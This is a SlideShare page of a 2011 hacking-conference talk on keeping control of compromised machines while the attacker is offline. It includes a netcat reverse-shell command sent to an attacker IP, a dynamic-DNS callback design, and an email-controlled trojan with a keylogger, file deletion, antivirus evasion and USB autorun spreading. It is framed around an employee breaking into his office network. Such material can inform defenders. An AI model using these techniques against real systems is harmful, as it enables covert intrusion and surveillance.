SlideShare a Scribd company logo

Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)

ClubHack
ClubHack

ClubHack 2011 Hacking and Security Conference. Talk - Handle Explotion of Remote System Without Being Online Speaker - Merchant Bhaumik

Technology
1 of 48
Download to read offline
Handle Explotion of Remote System Without Being Online !! By Merchant Bhaumik
Who Am I ? • Currently Helping local law-enforcement And Helping In Securing Some Government Websites • Developer Of IND 360 Intrusion Detection System ( Host Based As Well As Network Based Detection ) • Communicating with Metasploit Guys To Develop Term Called “ Universal Payload”
Presentation Flow……. •Reverse Shell Using Dynamic-Dns Concepts • Getting Data From Victim Computer Using Email Tool
We Will Understand This Mechanism By Considering One Scenario……..
Jack’s Situaion………. Jack Working In A Company ...............! In Which All Computers Behind The NAT BOX……. ………………………! And He Just Decided To Break One Of The System Of His Office And Getting Shell From Office To Home Computer
Problems For Jack…. •Company Has NIDS/IPS ( Network IDS ) ….. So No In Bound Connections…………. •He Don’t Know What IP Address Is Allocated By His ISP •He Can’t Use Any Mechanism Which Constantly Sends Some OutBound Traffic
Good Thing For Jack…. • Jack’s Office Allow Him To Access His Gmail Account..N Allow Some OutBound Traffic..
I # INCLUDE< REVERSE SHELL >
Why Reverse Shell ? •Reverse Shell is one of the powerful method for Bypassing Network Intrusion Detection Systems , Firewalls ( Most Of The) etc • Because Some of this network intrusion only monitors In-bound connection … Not the Out-bound …… • Jack Has DMZ Network In His Office…..
Diagram 1 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
Diagram 2 (Normal Attack ! ) 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( Attacker IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 Step I : Start Handler on port 4343 nc –l –p 4343 Victim Step II : nc 49.24.3.12 4343 –e cmd.exe
Normal Flow Of Getting Reverse Shell Exploit ! Attacker Starts Handler Vuln. Injection N All that ! Victim Sends Reverse Shell For Reverse Shell Scenario ! … To Attacker Machine !.. Attacker Wins !
But What’s Wrong With Jack? He Don’t Know What IP Address Is Allocated To His Computer ( Dynamic IP Allocation By ISPs)
Solution…. Attacker Is “Offline” But Still He Will Get Reverse Shell
My Way……. Exploit ! Starting Handler On Local Attacker Starts Handler Machine Is Optional ! Vuln. Injection N All that ! Victim Sends Reverse Shell For Reverse Shell Scenario ! … To Attacker Machine !.. Attacker Wins !
Flow Of Execution…… Attacker ! Attack Exe Running in Victim Machine * If Attacker is not online still the exe is up and running in Attacker No !! remote machine and Update IP? if attacker updates DNS records… The Yes !! Reverse Shell Is On The Attacker’s Desk !! Attacker Receives Reverse Shell
Mechanism • If the Code ( First Part ) receives positive Acknowledgement of sending packets ………… Jack Will Get Reverse Shell……………. •Else keep running in the victim machine and waits for Ack. From attacker’ machine…
Dynamic DNS Way…. (Initially ! ) • First Part : catchme.dyndns-ip.com ( 255.255.255.255 ) • Second Part : payload.dyndns-ip.com ( 255.255.255.255 ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
Dynamic DNS Way…. (Finally ! ) • First Part : catchme.dyndns-ip.com ( 127.0.0.1 ) • Second Part : payload.dyndns-ip.com (Attacker’s IP ) NEW FINAL EXE CONSIST OF First Part Synchronous Execution Second Part ( Single EXE ) New.exe
Metasploit………….!!!!! •You can embed my method (or My Exe ) with metasploit Payload which is of your choice . * The Structure of new Exe will be as per follow : NEW FINAL EXE CONSIS OF My Tool Synchronous Execution MSF PAYLOAD ( Single EXE ) ( LHOST = Dynamic ) New.exe
Hands On NetWork 192.168.1.1 192.168.1.2 49.24.3.12 117.254.4.123 D ( INDIVIDUAL IP ) ( PUBLIC IP ) M 192.168.1.3 INTERNET Z 192.168.1.4 192.168.1.5
Time To Enjoy Cooked Cookies And Recipes !!
Demo
II # INCLUDE <EMAIL TOOL >
Normal Remote Trojans & Viruses ! Attacker Victim (Must Be Online !) (Must Be Online !)
My Tool !! Caution: No Need To Be Online !! Attackers !! Attacker Victim MAY MAY OR OR MAY NOT ONLINE !! MAY NOT ONLINE !!
So, How It Works ?? Zombie Attacker Victim
But, Who Is Zombie?? @ It may be one of the below : It is one of like it……. Or one like this….. Or like this…….
Features !! Execute Operating System Level Commands By Using Emails ! Get all Network Card Information with Allocated IP Addresses ! Live Tracking Of the System being used by victim ! Get All available account‟ List ! Enable/Disable Key Logger ! This All Stuff With Gmail , Yahoo , Hotmail………!!
About It ! It is a simple application which Once Up & Going on Victim‟ Computer , Attacker can Handle it using Gmail , Yahoo , Hotmail Email Services… There is no need to be Online for Attacker to attack the Victim System….. Attacker Has to send attack instructions to Any of the mail service & then it is like sitting on the door & watching the event , “ when it‟s gonna open !!” As Victim Connects to the internet …. Attack Launches & the results are automatically sent back to the Attacker‟s email Address…..
Cool Benefits !! If the email account is used by using One of like below then it is totally Anti- Forensic ! No Reverse Detection Is Possible ! Create Unique password for all individual victims who are infected … Ability to handle multiple clients simultaneously ….. Delete Files In Victims Computer by Simply Sending An Email.. No Antivirus Can Detect Attack Because Of HTTPS ……
Tool Syntax ….. Password_For_Victim “: “Task_Commands”:” E.g. Pwd$98$ : Account_info : “Pwd$98$” is Password Command Which Sends back For The Particular Email Containing Account Info In Victim… Victim Computer !
Snap Shot 1…(Load Attack Instructions) Password For Individual Victim Send Account info Of Victim.. Send Drive Info Of Victim… Sends Mac , Network card Info...
Snap Shot 2…(Get Back Attack Result) Attached Info Of Victims Computer…! As Per Of Attacker‟ Choice My Emaill Account …… !
Why Gmail ??
No Fear Of Detection 1 No Direct Connection Between Attacker & Victim Attacker Victim
No Fear Of Detection 2 No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct It Self…….!
How To Spread This Code?? Autorun.inf by USB Drives………. Phisical Access Of Victim‟s System….. During Metasploit Explotion ……
Further Possible Development !! This Code Is Flexible Enough To Develop Further By My Hacker Friends….It Is Also Possible For Future To Send Exploits Or Trojans By Using This Code……. Any One Can Send Exploits , Trojans , RootKits , BackDoors By Simply Attaching It With Email And Sending It To His Own Account Or Account That is Configured In Victim‟ Code………
Pros N Cons 1 ! ( Be Transparent !! ) Advantages are that the attacker never goin to caught if he/she using the browser like TOR , Anononymizer , VPNs or Any PROXy…. For accessing the attacking gmail account. No Antivirus can detect the Instruction data because all traffic gonna come from HTTPS …..! Only single email account of gmail goin to use for both the side. Attacker and victim machine both goin to connect same account but attacker knows ,But Victim Don‟t !!
Pros N Cons 2 Disadvantage is that , if the victim has habit of checking the current connections using commands like „netstat –n‟ then possibility to detect Gmail connection when actually there is no browser activity. But still it is difficult to detect ………. Because process is running in Hidden mode….
Hands On Time..! ( Demo)
For More…… backdoor.security@gmail.com
Thanks Guys For Checking It Out …….!

Recommended

Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009Vincenzo Iozzo
 
Blackviper Xpsp2
Blackviper Xpsp2Blackviper Xpsp2
Blackviper Xpsp2nevjegypartner
 
Run command
Run commandRun command
Run commandSurya Singh
 
Run commands listed below in alphabetical order
Run commands listed below in alphabetical orderRun commands listed below in alphabetical order
Run commands listed below in alphabetical orderKondareddy Settipalli
 
Android Boot Time Optimization
Android Boot Time OptimizationAndroid Boot Time Optimization
Android Boot Time OptimizationKan-Ru Chen
 
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded Devices
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded DevicesQi -- Lightweight Boot Loader Applied in Mobile and Embedded Devices
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded DevicesNational Cheng Kung University
 
Learning AOSP - Android Booting Process
Learning AOSP - Android Booting ProcessLearning AOSP - Android Booting Process
Learning AOSP - Android Booting ProcessNanik Tolaram
 
“Linux Kernel CPU Hotplug in the Multicore System”
“Linux Kernel CPU Hotplug in the Multicore System”“Linux Kernel CPU Hotplug in the Multicore System”
“Linux Kernel CPU Hotplug in the Multicore System”GlobalLogic Ukraine
 

Recommended

Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009Vincenzo Iozzo
 
Blackviper Xpsp2
Blackviper Xpsp2Blackviper Xpsp2
Blackviper Xpsp2nevjegypartner
 
Run command
Run commandRun command
Run commandSurya Singh
 
Run commands listed below in alphabetical order
Run commands listed below in alphabetical orderRun commands listed below in alphabetical order
Run commands listed below in alphabetical orderKondareddy Settipalli
 
Android Boot Time Optimization
Android Boot Time OptimizationAndroid Boot Time Optimization
Android Boot Time OptimizationKan-Ru Chen
 
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded Devices
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded DevicesQi -- Lightweight Boot Loader Applied in Mobile and Embedded Devices
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded DevicesNational Cheng Kung University
 
Learning AOSP - Android Booting Process
Learning AOSP - Android Booting ProcessLearning AOSP - Android Booting Process
Learning AOSP - Android Booting ProcessNanik Tolaram
 
“Linux Kernel CPU Hotplug in the Multicore System”
“Linux Kernel CPU Hotplug in the Multicore System”“Linux Kernel CPU Hotplug in the Multicore System”
“Linux Kernel CPU Hotplug in the Multicore System”GlobalLogic Ukraine
 
“Automation Testing for Embedded Systems”
“Automation Testing for Embedded Systems” “Automation Testing for Embedded Systems”
“Automation Testing for Embedded Systems” GlobalLogic Ukraine
 
Defeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode RootkitsDefeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode RootkitsAlex Matrosov
 
Android Custom Kernel/ROM design
Android Custom Kernel/ROM designAndroid Custom Kernel/ROM design
Android Custom Kernel/ROM designMuhammad Najmi Ahmad Zabidi
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Nate Lawson
 
Fps tutorial 2
Fps tutorial 2Fps tutorial 2
Fps tutorial 2unityshare
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹GangSeok Lee
 
Finfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtFinfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtSecurity Bootcamp
 
Tactical Assassins
Tactical AssassinsTactical Assassins
Tactical AssassinsPrathan Phongthiproek
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
How to save home PCs for being Zombies ?
How to save home PCs for being Zombies ?How to save home PCs for being Zombies ?
How to save home PCs for being Zombies ?Pascal Kotté (ICT-a.ch, CloudReady, LiN, Tech4good)
 
ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT SuiteShota Shinogi
 
Exploits
ExploitsExploits
ExploitsTylor Shellenberger
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detectionamiable_indian
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Shota Shinogi
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Dll injection
Dll injectionDll injection
Dll injectionKarlFrank99
 
Project Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docxProject Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docxbriancrawford30935
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux EnvironmentEnrico Scapin
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723Iftach Ian Amit
 
DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)Michael Smith
 
Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Angelill0
 
Antivirus engine
Antivirus engineAntivirus engine
Antivirus engineShilpa Sreedhar
 

More Related Content

What's hot

“Automation Testing for Embedded Systems”
“Automation Testing for Embedded Systems” “Automation Testing for Embedded Systems”
“Automation Testing for Embedded Systems” GlobalLogic Ukraine
 
Defeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode RootkitsDefeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode RootkitsAlex Matrosov
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Nate Lawson
 
Fps tutorial 2
Fps tutorial 2Fps tutorial 2
Fps tutorial 2unityshare
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹GangSeok Lee
 

What's hot (6)

“Automation Testing for Embedded Systems”
“Automation Testing for Embedded Systems” “Automation Testing for Embedded Systems”
“Automation Testing for Embedded Systems”
 
Defeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode RootkitsDefeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode Rootkits
 
Android Custom Kernel/ROM design
Android Custom Kernel/ROM designAndroid Custom Kernel/ROM design
Android Custom Kernel/ROM design
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
 
Fps tutorial 2
Fps tutorial 2Fps tutorial 2
Fps tutorial 2
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
 

Similar to Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)

Finfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtFinfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtSecurity Bootcamp
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detectionamiable_indian
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Shota Shinogi
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Project Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docxProject Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docxbriancrawford30935
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux EnvironmentEnrico Scapin
 
DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)Michael Smith
 
Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Angelill0
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12Puppet
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 Avast
 
KeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long timeKeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long timen|u - The Open Security Community
 

Similar to Handle Explotion of Remote System Without Being Online (Merchant Bhaumik) (20)

Finfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtFinfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn Việt
 
Tactical Assassins
Tactical AssassinsTactical Assassins
Tactical Assassins
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
How to save home PCs for being Zombies ?
How to save home PCs for being Zombies ?How to save home PCs for being Zombies ?
How to save home PCs for being Zombies ?
 
ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT Suite
 
Exploits
ExploitsExploits
Exploits
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detection
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Dll injection
Dll injectionDll injection
Dll injection
 
Project Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docxProject Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docx
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723
 
DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)
 
Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09
 
Antivirus engine
Antivirus engineAntivirus engine
Antivirus engine
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018
 
KeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long timeKeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long time
 

More from ClubHack

India legal 31 october 2014
India legal 31 october 2014India legal 31 october 2014
India legal 31 october 2014ClubHack
 
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreCyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreClubHack
 
Cyber Insurance
Cyber InsuranceCyber Insurance
Cyber InsuranceClubHack
 
Summarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatSummarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatClubHack
 
Fatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleFatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleClubHack
 
The Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianThe Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianClubHack
 
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...ClubHack
 
Smart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodSmart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodClubHack
 
Legal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalLegal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalClubHack
 
Infrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathInfrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathClubHack
 
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
 
Hacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyHacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyClubHack
 
Critical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiCritical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiClubHack
 
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaContent Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaClubHack
 
XSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiXSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiClubHack
 
Clubhack Magazine Issue February 2012
Clubhack Magazine Issue February 2012Clubhack Magazine Issue February 2012
Clubhack Magazine Issue February 2012ClubHack
 
ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack
 
ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack
 
ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack
 
ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack
 

More from ClubHack (20)

India legal 31 october 2014
India legal 31 october 2014India legal 31 october 2014
India legal 31 october 2014
 
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreCyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
 
Cyber Insurance
Cyber InsuranceCyber Insurance
Cyber Insurance
 
Summarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatSummarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threat
 
Fatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleFatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep Kamble
 
The Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianThe Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas Kurian
 
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
 
Smart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodSmart Grid Security by Falgun Rathod
Smart Grid Security by Falgun Rathod
 
Legal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalLegal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara Agrawal
 
Infrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathInfrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy Hiremath
 
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
 
Hacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyHacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish Bomisstty
 
Critical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiCritical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh Belgi
 
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaContent Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
 
XSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiXSS Shell by Vandan Joshi
XSS Shell by Vandan Joshi
 
Clubhack Magazine Issue February 2012
Clubhack Magazine Issue February 2012Clubhack Magazine Issue February 2012
Clubhack Magazine Issue February 2012
 
ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012
 
ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012
 
ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012
 
ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack Magazine – December 2011
ClubHack Magazine – December 2011
 

Recently uploaded

Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
